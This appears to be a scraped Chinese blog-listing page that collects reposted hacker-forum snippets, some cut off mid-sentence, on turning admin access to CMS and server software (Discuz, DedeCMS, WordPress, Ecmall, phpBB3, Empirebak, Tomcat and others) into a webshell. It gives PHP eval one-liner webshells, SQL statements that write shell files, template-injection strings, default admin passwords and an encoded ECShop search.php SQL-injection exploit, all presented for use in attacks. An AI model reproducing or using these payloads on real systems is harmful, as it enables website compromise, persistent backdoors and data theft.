点模版管理-自定也页面-增加自定义页面 文件格式为.php 内容可以是一句话 可以是大马。。然后保存 在点管理自定义页面 找到你刚才那个 直接点页面名字,就可以访问。
转载
精选
2010-12-10 10:47:01
429阅读
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.
可在 http://www.phome.net/ebak2008os/ 下载到
默认账号密码为
admin 
转载
精选
2011-01-24 19:49:59
1742阅读
进后台直奔扩展->挂件管理,下面的每一个挂件都对应着Php文件~拿第一个最新成交挂件举例,直接点击编辑脚本,写你的一句话,然后连接external\widgets\latest_sold\main.widget.php~OK~结束
~另外说下Ecmall现在公布的那个2.2延迟注射其实不用那么麻烦~直接爆错注入就可以了~虽然Ecmall发生错误时会自动跳转到上一页~但是那点儿时
原创
2011-05-21 12:03:30
1659阅读
方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POS
翻译
精选
2013-06-21 11:09:57
1500阅读
有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html
/admin 目录下的利用:Service–host–actions–Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http://ip/g
转载
2010-03-24 18:12:54
585阅读
正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!
今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手.
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞
转载
精选
2011-02-08 21:01:10
752阅读
我记得以前看过这个资料,千翻万找总算翻了出来。
这个前提是可以编辑模板,不然我估计是没什么希望了。
templates/default/actions.lang.php(以这个为例)
在最底那提交
游客\');?>
\'g\'=>\'sdfsdf
便能写入一句话木马并正常执行.
原创
2007-12-08 15:38:00
1914阅读
1. dedecms方法 文件上传(分为图片上传或者文件管理器上传) 文件包含漏洞,在模块管理中将一句话插入到html的文件中(优先为文件主页) 也可以在核心设置中插入一句话,从而将一句话插入到data\config.cache.inc.php中。 2. 帝国cms方法(mpirecms) 该cms ...
转载
2021-08-19 13:41:00
574阅读
2评论
内容:
phpbb3 拿到管理员账号进去能干什么呢?又不能上传个SHELL。确实很头疼啊
搜半天都没搜到有牛人拿到过。难道没人研究它?
去年就试过些招。还是没搞定。今天遇到个phpbb3。终于还是拿到shell了。。。
要是能找到执行类似phpmyadmin之类的执行数据库语句的地方。拿shell还是比较简单的
需要两条语句。还有绝对路径。。如下
INSERT INTO phpbb
转载
2011-08-05 23:34:53
1523阅读
来自t00ls
不是0day,只是之前用了一周的WP试着做博客来着。发现WP如果能进后台就可以直接拿SHELL的。
大牛说插入404文件,那个何必呢,动别人文件总归是不好,插挂了就悲剧了。
本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content\themes\wa
转载
精选
2010-12-18 12:21:47
1856阅读
//target/images/upload/M
转载
2023-05-19 14:37:47
340阅读
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在
Copy code
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Copy code
";eval($_
转载
精选
2008-01-29 16:43:00
521阅读
来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。
转载
精选
2010-07-10 21:04:00
3740阅读
来源:网络
dz后台-全局-ucenter ip地址插入:
3EST\\’);eval($_POST[a])?>;//
保存后再插入一遍!然后连 http://localhost/dz/config.inc.php成功!
以上我在dz7.0-dz.7.2最新官方下载版本测试通过。
转载
精选
2010-12-28 22:33:49
612阅读
author:meao
www.secmao.tk 转载请注明
常规设置:站点地址和管理员邮箱处插入代码
站点地址:http://''''''''''''''<?php eval($_POST[cmd])?>'''''''''''''''''''''\\
管理员邮箱:''''''''''''''<?php eval($_POST[cmd])?>
转载
精选
2010-07-15 21:36:20
3875阅读
见http://www.wooyun.org/bugs/wooyun-2010-03787以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQam
原创
2013-05-15 14:07:08
1643阅读
fhod 邪恶八进制帝国备份王(Empirebak)简介EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.可在 http://www.phome.net/ebak2008os/ 下载到默认账号密码为admin 123456登陆后先备份一次数据备份时可选择备份到的目录。。默认有个safemod当然也可以
转载
精选
2010-04-26 22:56:02
1088阅读
代码就把账号密码注射出来了)search.ph
转载
2023-05-19 14:37:49
526阅读
这个说明内存不足。需要更改php.ini配置文件,打开php.ini 修改memory_limit = 的这行
依照服务器配置进行调整
配置的内存使用大小修改后重启iis/apache
OK,解决
原创
2011-04-18 16:02:27
552阅读
这个是search.php exp 变种
search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uI
转载
精选
2011-01-21 19:09:59
3072阅读
